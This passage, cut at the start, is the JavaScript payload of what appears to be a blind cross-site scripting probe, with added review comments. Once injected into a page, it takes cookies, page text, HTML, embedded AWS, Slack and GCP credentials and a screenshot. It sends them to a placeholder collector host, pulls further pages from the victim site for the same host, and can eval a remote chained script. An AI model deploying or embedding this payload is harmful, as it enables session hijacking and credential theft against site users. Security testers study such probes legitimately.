 */
function never_null( value ) {
    return value === undefined ? '' : value;
}
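/**
 * Request every path listed in collect_page_list via collect_page_data().
 * Paths missing a leading "/" are rewritten in place in collect_page_list.
 *
 * @param {*} pgp_key - forwarded unchanged to collect_page_data().
 */
function collect_pages(pgp_key) {
    for( var i = 0; i < collect_page_list.length; i++ ) {
        // Make sure the path is correctly formatted
        if( collect_page_list[i].charAt(0) != "/" ) {
            collect_page_list[i] = "/" + collect_page_list[i];
        }
        collect_page_data( collect_page_list[i], pgp_key );
    }
}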
/**
 * Fetch a script over XHR and run it with eval() in the current page.
 *
 * NOTE(review): the response is evaluated once the request reaches DONE, with no
 * status or content check, and runs with the privileges of the embedding page.
 * A Content-Security-Policy that omits 'unsafe-eval' stops this step, and a
 * restrictive connect-src stops the request itself.
 *
 * @param {string} uri - address of the script to load.
 */
function eval_remote_source( uri ) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        // Ignore every state change except the final one.
        if ( xhr.readyState != XMLHttpRequest.DONE ) {
            return;
        }
        eval( xhr.responseText );
    }
    xhr.open( 'GET', uri, true );
    xhr.send( null );
}
/**
 * Register an event handler, preferring addEventListener and falling back to
 * attachEvent. Does nothing when the element offers neither method.
 *
 * @param {Object} element - event target.
 * @param {string} eventName - event name without the "on" prefix.
 * @param {Function} fn - handler.
 */
function addEvent(element, eventName, fn) {
    if (element.addEventListener) {
        element.addEventListener(eventName, fn, false);
        return;
    }
    if (element.attachEvent) {
        // attachEvent expects the "on"-prefixed name.
        element.attachEvent('on' + eventName, fn);
    }
}
/**
 * Return the text of document.body, taking the first of outerText, innerText and
 * textContent that is a string.
 *
 * @returns {string} the extracted text, or '' when none of the three is a string.
 */
function get_dom_text() {
    // All three properties are read up front, in this order.
    var candidates = [
        document.body.outerText,
        document.body.innerText,
        document.body.textContent,
    ];
    var firstString = candidates.find(function(candidate) {
        return typeof candidate === 'string';
    });
    return firstString === undefined ? '' : firstString;
}
/**
 * Build a string of ASCII letters and digits, one Math.random() draw per character.
 * Math.random() is not a cryptographic source.
 *
 * @param {number} length - number of characters to produce.
 * @returns {string}
 */
function generate_random_string(length) {
    var alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    var result = "";
    for (var n = 0; n < length; n++) {
        var pick = Math.floor(Math.random() * alphabet.length);
        result += alphabet.charAt(pick);
    }
    return result;
}
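/**
 * POST the collected report as multipart form data to "[HOST_URL]/js_callback".
 * "[HOST_URL]" and "[USER_PATH]" are template slots, presumably filled in by the
 * server before the file is served (confirm against the backend).
 *
 * With a PGP key: the screenshot, if present, is encrypted on its own and attached as
 * "screenshot.enc"; the remaining fields are JSON-encoded and encrypted into
 * "encrypted_data". The "injection_key" field and the public key itself are sent
 * unencrypted next to the ciphertext.
 * Without a key: every field is sent as-is, the screenshot as a PNG blob.
 *
 * @param {Object} probe_return_data - report fields; its "screenshot" property is
 *   deleted from this object when a key is used.
 * @param {string} pgp_key - armored public key; a falsy value selects the unencrypted path.
 * @returns {Promise<undefined>} resolves once the request has been handed to send().
 */
let contact_mothership = async function(probe_return_data, pgp_key) {
    var form_data = new FormData();
    // Key list is taken before the screenshot is removed; only the unencrypted path uses it.
    var payload_keys = Object.keys(probe_return_data);
    if (pgp_key){
        if("screenshot" in probe_return_data){
            const encrypted_screenshot = await pgp_encrypt(pgp_key, probe_return_data['screenshot']);
            var encryptedBlob = new Blob([encrypted_screenshot], {
                type: 'text/plain'
            });
            form_data.append("screenshot", encryptedBlob, "screenshot.enc")
            // Keep the screenshot out of the JSON blob encrypted below.
            delete probe_return_data.screenshot;
        }
        const probe_data = await pgp_encrypt(pgp_key, JSON.stringify(probe_return_data));
        form_data.append("encrypted_data", probe_data);
        form_data.append("injection_key", probe_return_data['injection_key']);
        form_data.append("pgp_key", pgp_key);
    }else{
        payload_keys.map(function(payload_key) {
            if(payload_key === 'screenshot') {
                // Strip the data-URI prefix so only the base64 payload is decoded.
                var base64_data = probe_return_data[payload_key].replace(
                    'data:image/png;base64,',
                    ''
                );
                var screenshot_blob = base64_to_blob(
                    base64_data,
                    'image/png'
                );
                form_data.append(
                    payload_key,
                    screenshot_blob,
                    "screenshot.png"
                )
                return
            }
            form_data.append(payload_key, probe_return_data[payload_key]);
        })
    }
    var http = new XMLHttpRequest();
    var url = "[HOST_URL]/js_callback";
    http.open("POST", url, true);
    // The response is not used; the handler body is intentionally empty.
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
        }
    }
    form_data.append("path", "[USER_PATH]");
    http.send(form_data);
}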
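/**
 * POST one collected page as multipart form data to "[HOST_URL]/page_callback".
 * Every property of page_data becomes a form field, followed by a "path" field
 * holding the "[USER_PATH]" template slot. Nothing on this path is encrypted.
 *
 * @param {Object} page_data - fields to send; collect_page_data() passes "html" and "uri".
 */
function send_collected_page( page_data ) {
    var form_data = new FormData();
    var payload_keys = Object.keys(page_data);
    payload_keys.map(function(payload_key) {
        form_data.append(payload_key, page_data[payload_key]);
    });
    var http = new XMLHttpRequest();
    var url = "[HOST_URL]/page_callback";
    http.open("POST", url, true);
    // The response is not used; the handler body is intentionally empty.
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
        }
    }
    form_data.append("path", "[USER_PATH]");
    http.send(form_data);
}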
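/**
 * Scan a string for three credential patterns (AWS access key id, Slack webhook URL,
 * GCP service-account JSON) and report the first match of each type.
 *
 * The patterns are ordinary string literals, so the backslashes in "\." , "\{" and "\}"
 * are consumed by the string parser before RegExp sees them; "." therefore matches
 * any character in the Slack pattern.
 * "secret_value" is the exec() result converted with toString(): the full match
 * followed by each capture group, joined by commas.
 *
 * Everything matched here is content already present in the page markup, which any
 * script running in the page can read; credentials do not belong in rendered HTML.
 *
 * @param {string} data - text to scan (the caller passes the document's outerHTML).
 * @returns {Array<{secret_type: string, secret_value: string}>} at most one finding per type.
 */
function look_for_secrets( data ) {
    var findings = [];
    let secret_regexes = {
        "aws": "((?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16})",
        "slack": "(https://hooks\.slack\.com/services/[A-Za-z0-9+/]{44,46})",
        "GCP": "\{[^{]+auth_provider_x509_cert_url[^}]+\}"
    }
    for (let secret_type in secret_regexes){
        let re = new RegExp(secret_regexes[secret_type])
        let match = re.exec(data);
        // exec() returns an array on a match and null otherwise.
        if (Array.isArray(match)){
            match = match.toString()
            let finding = {"secret_type": secret_type, "secret_value": match};
            findings.push(finding);
        }
    }
    return findings
}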
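/**
 * GET a path on the current host and forward the response body through
 * send_collected_page().
 *
 * The pgp_key parameter is accepted but never used, so collected pages leave the
 * browser unencrypted even when a key is configured.
 * page_data is assigned without a declaration, so in a non-strict script it becomes
 * a property of the global object and remains visible on the page afterwards.
 * Any exception raised while setting up the request is silently discarded.
 *
 * @param {string} path - path starting with "/".
 * @param {*} pgp_key - unused.
 */
function collect_page_data( path, pgp_key ) {
    try {
        var full_url = location.protocol + "//" + document.domain + path
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function() {
            // The body is forwarded once the request is DONE, whatever the HTTP status.
            if (xhr.readyState == XMLHttpRequest.DONE) {
                page_data = {
                    "html": xhr.responseText,
                    "uri": full_url
                }
                send_collected_page( page_data );
            }
        }
        xhr.open('GET', full_url, true);
        xhr.send(null);
    } catch ( e ) {
    }
}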
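// Report object filled in below and sent by contact_mothership().
// Assigned without a declaration, so in a non-strict script it becomes a property
// of the global object of the page the script runs in.
probe_return_data = {};
// Prevent failure incase the browser refuses to give us any of the probe data.
// Each field is read in its own try/catch so one blocked API only blanks that field.
try {
    probe_return_data['uri'] = never_null( location.toString() );
} catch ( e ) {
    probe_return_data['uri'] = '';
}
try {
    // document.cookie only exposes cookies that are not flagged HttpOnly.
    probe_return_data['cookies'] = never_null( document.cookie );
} catch ( e ) {
    probe_return_data['cookies'] = '';
}
try {
    probe_return_data['referrer'] = never_null( document.referrer );
} catch ( e ) {
    probe_return_data['referrer'] = '';
}
try {
    probe_return_data['user-agent'] = never_null( navigator.userAgent );
} catch ( e ) {
    probe_return_data['user-agent'] = '';
}
try {
    // Milliseconds since the epoch according to the browser's clock.
    probe_return_data['browser-time'] = never_null( ( new Date().getTime() ) );
} catch ( e ) {
    probe_return_data['browser-time'] = '';
}
try {
    probe_return_data['probe-uid'] = never_null( get_guid() );
} catch ( e ) {
    probe_return_data['probe-uid'] = '';
}
try {
    probe_return_data['origin'] = never_null( location.origin );
} catch ( e ) {
    probe_return_data['origin'] = '';
}
try {
    // [PROBE_ID] is a template slot, presumably replaced server-side (confirm against the backend).
    probe_return_data['injection_key'] = [PROBE_ID];
} catch ( e ) {
    probe_return_data['injection_key'] = '';
}
try{
    probe_return_data['title'] = document.title;
} catch( e ){
    probe_return_data['title'] = '';
}
try{
    probe_return_data['text'] = get_dom_text();
} catch( e ){
    probe_return_data['text'] = '';
}
try{
    // true when the script runs inside a frame rather than the top-level window.
    probe_return_data['was_iframe'] = !(window.top === window)
} catch( e ){
    probe_return_data['was_iframe'] = '';
}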
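/**
 * Run the checks that need a loaded page, capture a screenshot and hand over to
 * finishing_moves().
 *
 * Steps, in order: scan the document's outerHTML with look_for_secrets(), run
 * check_cors() and check_git(), JSON-encode the findings, render document.body with
 * html2canvas, blur the render with StackBlur (radius 20), copy it onto a
 * 2560x1440 canvas and store that canvas as a data URL.
 *
 * The html2canvas promise is neither awaited nor given a rejection handler, so the
 * surrounding try/catch only covers synchronous failures; if rendering rejects,
 * finishing_moves() is not called from here.
 */
async function hook_load_if_not_ready() {
    try {
        try {
            probe_return_data['secrets'] = look_for_secrets(never_null( document.documentElement.outerHTML ));
        } catch ( e ) {
            probe_return_data['secrets'] = [];
        }
        try{
            const corsResults = await check_cors();
            probe_return_data['CORS'] = corsResults;
        } catch (e) {
            // Note the fallback is the string "false", while check_cors() itself returns boolean false.
            probe_return_data['CORS'] = "false";
        }
        try{
            const gitResults = await check_git();
            probe_return_data['gitExposed'] = gitResults;
        } catch (e) {
            // Same string-versus-boolean difference as for CORS above.
            probe_return_data['gitExposed'] = "false";
        }
        // Form fields are strings, so the findings array is serialised here.
        probe_return_data['secrets'] = JSON.stringify(probe_return_data['secrets']);
        html2canvas(document.body).then(function(canvas) {
            // Blur the whole render in place before it is exported.
            StackBlur.canvasRGB(
                canvas, 0, 0, canvas.width, canvas.height, 20
            );
            var tempCanvas = document.createElement("canvas"),
                tCtx = tempCanvas.getContext("2d");
            // Fixed-size target: anything beyond 2560x1440 is cut off by drawImage at 0,0.
            tempCanvas.width = 2560;
            tempCanvas.height = 1440;
            tCtx.drawImage(canvas,0,0);
            probe_return_data['screenshot'] = tempCanvas.toDataURL();
            finishing_moves();
        });
    } catch( e ) {
        probe_return_data['screenshot'] = '';
        await finishing_moves();
    }
}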
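// [pgp_key] is a template slot, presumably replaced server-side with an armored
// public key or left empty (confirm against the backend).
const pgp_key = `[pgp_key]`;
/**
 * Final stage: send the report, request the configured extra pages, then load the
 * chained script if one is configured.
 *
 * collect_pages() is called without an argument, so its pgp_key parameter is
 * undefined on this path.
 */
let finishing_moves = async function() {
    await contact_mothership( probe_return_data, pgp_key );
    collect_pages();
    // Loose comparisons: skipped for "", null and undefined.
    if( chainload_uri != "" && chainload_uri != null ) {
        eval_remote_source( chainload_uri );
    }
}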
// Entry point: run immediately when the document has finished loading,
// otherwise wait for the window "load" event.
if( document.readyState != "complete" ) {
    addEvent( window, "load", function(){
        hook_load_if_not_ready();
    });
} else {
    hook_load_if_not_ready();
}